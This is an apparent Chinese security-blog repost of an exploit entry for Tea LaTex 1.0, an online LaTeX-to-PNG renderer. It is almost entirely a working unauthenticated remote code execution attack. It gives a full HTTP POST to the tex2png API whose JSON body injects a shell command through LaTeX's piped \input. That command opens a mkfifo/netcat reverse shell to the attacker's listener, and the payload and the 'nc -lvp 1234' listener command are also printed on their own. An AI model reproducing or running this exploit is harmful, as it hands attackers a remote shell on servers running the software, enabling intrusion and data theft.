Tea LaTex 1.0-远程执行代码(未经身份验证)—Hack之路

Tea LaTex 1.0-远程执行代码(未经身份验证)
#利用漏洞作者:nepska
#供应商主页:https://github.com/ammarfaizi2/latex.teainside.org
#软件链接:https://github.com/ammarfaizi2/latex.teainside.org
#版本:v1.0
#测试于:Kali linux / Windows 10
#CVE:不适用


#标头请求
POST /api.php?action=tex2png HTTP/1.1
Host: latex.teainside.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
DNT: 1
Connection: keep-alive
Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403
{"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"}
# Payload
\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}
# Attacker
nc -lvp 1234

                                                        

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/12/tea-latex-1-0-%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81%e6%9c%aa%e7%bb%8f%e8%ba%ab%e4%bb%bd%e9%aa%8c%e8%af%81-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注